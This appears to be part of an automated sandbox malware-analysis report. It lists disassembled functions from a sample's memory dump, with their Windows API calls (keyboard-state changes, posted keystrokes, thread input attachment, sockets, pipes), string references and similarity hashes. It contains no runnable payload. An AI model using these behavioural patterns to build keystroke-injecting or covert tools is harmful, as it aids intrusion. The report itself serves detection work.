Part of subcall function 0057000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0056FF41,80070057,?), ref: 00570064

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00594C51
_wcslen.LIBCMT ref: 00594D59
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00594DCF
CoTaskMemFree.OLE32(?), ref: 00594DDA

Strings

NULL Pointer assignment, xrefs: 00594E23, 00594E52

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
String ID: NULL Pointer assignment
API String ID: 614568839-2785691316
Opcode ID: 0d877d0f5680bbfd8bc4b1a12b15a4521c267de10851dd49e1813de6f20319c2
Instruction ID: 60621b3f739e646e4d965c75ee284f12d03f14d315a975b55d033b0dbefe4138
Opcode Fuzzy Hash: 0d877d0f5680bbfd8bc4b1a12b15a4521c267de10851dd49e1813de6f20319c2
Instruction Fuzzy Hash: 80911671D0021AAFDF10DFA4D895EEEBBB8BF48310F108569E919A7241DB309E45CF60

Function 005A20FD Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 005A2183
GetMenuItemCount.USER32(00000000), ref: 005A21B5
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 005A21DD
_wcslen.LIBCMT ref: 005A2213
GetMenuItemID.USER32(?,?), ref: 005A224D
GetSubMenu.USER32(?,?), ref: 005A225B

Part of subcall function 00573A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00573A57
Part of subcall function 00573A3D: GetCurrentThreadId.KERNEL32 ref: 00573A5E
Part of subcall function 00573A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,005725B3), ref: 00573A65

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 005A22E3

Part of subcall function 0057E97B: Sleep.KERNEL32 ref: 0057E9F3

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
String ID:
API String ID: 4196846111-0
Opcode ID: deacf3830d8861101780d6197a2ba610c0aaa59550de352db55d4be65323758f
Instruction ID: c20852dbd681ee844113cfb4df46e37ba3a5a5cefbeecbe0b2aa2c3e45403db4
Opcode Fuzzy Hash: deacf3830d8861101780d6197a2ba610c0aaa59550de352db55d4be65323758f
Instruction Fuzzy Hash: 55714B75A00215AFCB10DF68C846AAEBFF5BF8A310F148469E916AB351DB34ED418B90

Function 0057AEBA Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 0057AEF9
GetKeyboardState.USER32(?), ref: 0057AF0E
SetKeyboardState.USER32(?), ref: 0057AF6F
PostMessageW.USER32(?,00000101,00000010,?), ref: 0057AF9D
PostMessageW.USER32(?,00000101,00000011,?), ref: 0057AFBC
PostMessageW.USER32(?,00000101,00000012,?), ref: 0057AFFD
PostMessageW.USER32(?,00000101,0000005B,?), ref: 0057B020

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 4f1173effa0c305a0a07e059feb70ada640a78b3b7c93d56ff0aa68b6667f26a
Instruction ID: 7be483fbd37eb13ca928255f13004dd394cd7099eaf4d2ad01014ca44ad8056f
Opcode Fuzzy Hash: 4f1173effa0c305a0a07e059feb70ada640a78b3b7c93d56ff0aa68b6667f26a
Instruction Fuzzy Hash: 4351D1A06087D53DFB3682349C49BBEBEA96B46304F08C589E1DD958C3D398ACC8E751

Function 0057ACDA Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 0057AD19
GetKeyboardState.USER32(?), ref: 0057AD2E
SetKeyboardState.USER32(?), ref: 0057AD8F
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 0057ADBB
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 0057ADD8
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 0057AE17
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 0057AE38

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: c43deac456268518980e2d445fc184cb9d67f655e4d90ae42bd94ce82bec954f
Instruction ID: 2a5d4e7a1b1f96e325617f309cc14afbe8a8c276494c597c50560d8cea99cd91
Opcode Fuzzy Hash: c43deac456268518980e2d445fc184cb9d67f655e4d90ae42bd94ce82bec954f
Instruction Fuzzy Hash: 8D51B3A15047D53DFB3783249C55BBE7EA97B86300F08C589E5DD868C2D294EC88F762

Function 0054542E Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(00553CD6,?,?,?,?,?,?,?,?,00545BA3,?,?,00553CD6,?,?), ref: 00545470
__fassign.LIBCMT ref: 005454EB
__fassign.LIBCMT ref: 00545506
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00553CD6,00000005,00000000,00000000), ref: 0054552C
WriteFile.KERNEL32(?,00553CD6,00000000,00545BA3,00000000,?,?,?,?,?,?,?,?,?,00545BA3,?), ref: 0054554B
WriteFile.KERNEL32(?,?,00000001,00545BA3,00000000,?,?,?,?,?,?,?,?,?,00545BA3,?), ref: 00545584

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 682d5176a5f3b3f1c0d048d993e3aceda236afee3b24c48ac106d56ed995fb66
Instruction ID: 24808c6eb1eebcecf855a58c8dca5a9990f6fc865d75660e9bc5a7327662084e
Opcode Fuzzy Hash: 682d5176a5f3b3f1c0d048d993e3aceda236afee3b24c48ac106d56ed995fb66
Instruction Fuzzy Hash: 4B51E270A00649AFDB11CFA8D885AEEBFF9FF09304F14451AF955E7292E7309A41CB60

Function 005910B8 Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0059304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0059307A
Part of subcall function 0059304E: _wcslen.LIBCMT ref: 0059309B

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00591112
WSAGetLastError.WSOCK32 ref: 00591121
WSAGetLastError.WSOCK32 ref: 005911C9
closesocket.WSOCK32(00000000), ref: 005911F9

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
String ID:
API String ID: 2675159561-0
Opcode ID: 52c1d0984418bdefbaf55567892f54968910bd33872977c18160b35f4cdbc218
Instruction ID: 04beafee710abd91a90cd2a77743609229ea6634105e9c3ca98ffbced2de8dcd
Opcode Fuzzy Hash: 52c1d0984418bdefbaf55567892f54968910bd33872977c18160b35f4cdbc218
Instruction Fuzzy Hash: 7C412531600616AFEB109F14C888BA9BFE9FF85324F148059FD169B291C774ED85DBE4

Function 0057CF00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0057DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0057CF22,?), ref: 0057DDFD

Part of subcall function 0057DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0057CF22,?), ref: 0057DE16

lstrcmpiW.KERNEL32(?,?), ref: 0057CF45
MoveFileW.KERNEL32(?,?), ref: 0057CF7F
_wcslen.LIBCMT ref: 0057D005
_wcslen.LIBCMT ref: 0057D01B
SHFileOperationW.SHELL32(?), ref: 0057D061

Strings

\*.*, xrefs: 0057CFF3

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
String ID: \*.*
API String ID: 3164238972-1173974218
Opcode ID: b2adf41d0e0980f70a79bc6dd2825a0315901cbbea0c00f4b0856cc63b38b3cf
Instruction ID: ada66f8667195852e43d9519554c622855c0565a0c124dc18f69882a95181e2f
Opcode Fuzzy Hash: b2adf41d0e0980f70a79bc6dd2825a0315901cbbea0c00f4b0856cc63b38b3cf
Instruction Fuzzy Hash: FA4158719052195FDF12EFA4D985BDD7FB8BF49340F0040E6E509E7141EA34A688DB50

Function 005A2DFD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 005A2E1C
GetWindowLongW.USER32(00000000,000000F0), ref: 005A2E4F
GetWindowLongW.USER32(00000000,000000F0), ref: 005A2E84
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 005A2EB6
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 005A2EE0
GetWindowLongW.USER32(00000000,000000F0), ref: 005A2EF1
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 005A2F0B

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: a10d1cbca326467a2bf8d54234813347081dd57b8fbb8e05d43d1b0f40771c60
Instruction ID: 1ece014ebc33cc210ac4a3980a161cae4336022ef94b4a8af5ac0834027a5871
Opcode Fuzzy Hash: a10d1cbca326467a2bf8d54234813347081dd57b8fbb8e05d43d1b0f40771c60
Instruction Fuzzy Hash: EC31E230604150AFDB25CF5CDC86F693BE9FBAA710F150164F944CF2A2CB71A884EB41

Function 00577726 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00577769
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0057778F
SysAllocString.OLEAUT32(00000000), ref: 00577792
SysAllocString.OLEAUT32(?), ref: 005777B0
SysFreeString.OLEAUT32(?), ref: 005777B9
StringFromGUID2.OLE32(?,?,00000028), ref: 005777DE
SysAllocString.OLEAUT32(?), ref: 005777EC

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 9b357f3757675ea6193aa3eb07c3e6a6d1622eea56f768f78aff5107d63e2e52
Instruction ID: 2c3f50426a146e8d2bc7d00069235f1cea404695fe4d317a572107786424b804
Opcode Fuzzy Hash: 9b357f3757675ea6193aa3eb07c3e6a6d1622eea56f768f78aff5107d63e2e52
Instruction Fuzzy Hash: CA21AE7660421DAFDF14DFA8EC88CBB7BACFB0E3647008425BA18DB190D670DC469764

Function 005777FD Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00577842
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00577868
SysAllocString.OLEAUT32(00000000), ref: 0057786B
SysAllocString.OLEAUT32 ref: 0057788C
SysFreeString.OLEAUT32 ref: 00577895
StringFromGUID2.OLE32(?,?,00000028), ref: 005778AF
SysAllocString.OLEAUT32(?), ref: 005778BD

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 2353690a7d64af4df6c91fdc47f123bc3805bf443831cf0f3e37044705d9dfbe
Instruction ID: f04f6c16220ee9e93ed60939c5d961383f60e93ca6d7507fa7efb3135eb97a5d
Opcode Fuzzy Hash: 2353690a7d64af4df6c91fdc47f123bc3805bf443831cf0f3e37044705d9dfbe
Instruction Fuzzy Hash: A0215E31608219AF9F109BA8EC8CDBA7BECFB0D7607108125B919CB2A1DA74DC45DB65

Function 005804D2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 005804F2
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 0058052E

Strings

nul, xrefs: 00580567

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: 9163fb88ef69ad07d9bcbf2d9abde371c666f0f824b76126871922de985afc78
Instruction ID: 9c7d3147b386a8114e02b5750a2c6f5bd12c813dd4f1ddfa126cea67167ce39d
Opcode Fuzzy Hash: 9163fb88ef69ad07d9bcbf2d9abde371c666f0f824b76126871922de985afc78
Instruction Fuzzy Hash: 90212C75600305AFDF60AF69D844A9A7FE4BF55724F204A19ECA1E62E0E7709948DF30

Function 005805A7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 005805C6
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00580601

Strings

nul, xrefs: 00580639

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: 469c7f529e6904b28756ad76fc6052d83c925d50faf29598e57948f3ca456fbc
Instruction ID: e5c723a863d6c6fe7cf82ad9c551b56497688e16fb38169c5e756eea4dd4cab2
Opcode Fuzzy Hash: 469c7f529e6904b28756ad76fc6052d83c925d50faf29598e57948f3ca456fbc
Instruction Fuzzy Hash: AB2153755003059FDB60AF6A9C04A6A7FE4BF95720F205B19FCA1F72E0E7709969CB20

Function 005A40AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0051600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0051604C
Part of subcall function 0051600E: GetStockObject.GDI32(00000011), ref: 00516060
Part of subcall function 0051600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0051606A

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 005A4112
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 005A411F
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 005A412A
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 005A4139
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 005A4145

Strings

Msctls_Progress32, xrefs: 005A40E3

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: 12330973ad5a0c88b0ba4e5418dedbe544a927d7a456d07af947f54c5f628b4f
Instruction ID: cb4d0cc8cb859647043195d014e59a02076571dedb0c9a3cb7cb2736a4013ce4
Opcode Fuzzy Hash: 12330973ad5a0c88b0ba4e5418dedbe544a927d7a456d07af947f54c5f628b4f
Instruction Fuzzy Hash: 8311B6B114011D7EEF118FA4CC85EEB7F5DFF59798F004111B618A6150C6729C61DBA4

Function 0054D7DF Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0054D7A3: _free.LIBCMT ref: 0054D7CC

_free.LIBCMT ref: 0054D82D

Part of subcall function 005429C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0054D7D1,00000000,00000000,00000000,00000000,?,0054D7F8,00000000,00000007,00000000,?,0054DBF5,00000000), ref: 005429DE
Part of subcall function 005429C8: GetLastError.KERNEL32(00000000,?,0054D7D1,00000000,00000000,00000000,00000000,?,0054D7F8,00000000,00000007,00000000,?,0054DBF5,00000000,00000000), ref: 005429F0

_free.LIBCMT ref: 0054D838
_free.LIBCMT ref: 0054D843
_free.LIBCMT ref: 0054D897
_free.LIBCMT ref: 0054D8A2
_free.LIBCMT ref: 0054D8AD
_free.LIBCMT ref: 0054D8B8

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
Instruction ID: 417ec84ad38db8e74e8797b67926e58fb58d938e5b93832e5d11f6772c22c25f
Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
Instruction Fuzzy Hash: 1B114F71540B15ABE921BFB1CC4BFCB7FFCBF80704F800825B29DA6192DA79B5454660

Function 0057DA5A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0057DA74
LoadStringW.USER32(00000000), ref: 0057DA7B
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0057DA91
LoadStringW.USER32(00000000), ref: 0057DA98
MessageBoxW.USER32(00000000,?,?,00011010), ref: 0057DADC

Strings

%s (%d) : ==> %s: %s %s, xrefs: 0057DAB9

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: HandleLoadModuleString$Message
String ID: %s (%d) : ==> %s: %s %s
API String ID: 4072794657-3128320259
Opcode ID: a3e50674b9392eec5578a4a4c1b0e4618bff2f7d6d3b45e7e0f1088cc93f5f71
Instruction ID: 47a6e13620e782190c6b3c9374313eeff20332fda4825a87478aa119a98b56a1
Opcode Fuzzy Hash: a3e50674b9392eec5578a4a4c1b0e4618bff2f7d6d3b45e7e0f1088cc93f5f71
Instruction Fuzzy Hash: 560167F25002087FEB10D7A49D89EEB3BBCFB05301F404456B709E2041E6749E849F74

Function 0058096B Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(0157E9B8,0157E9B8), ref: 0058097B
EnterCriticalSection.KERNEL32(0157E998,00000000), ref: 0058098D
TerminateThread.KERNEL32(00000007,000001F6), ref: 0058099B
WaitForSingleObject.KERNEL32(00000007,000003E8), ref: 005809A9
CloseHandle.KERNEL32(00000007), ref: 005809B8
InterlockedExchange.KERNEL32(0157E9B8,000001F6), ref: 005809C8
LeaveCriticalSection.KERNEL32(0157E998), ref: 005809CF

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
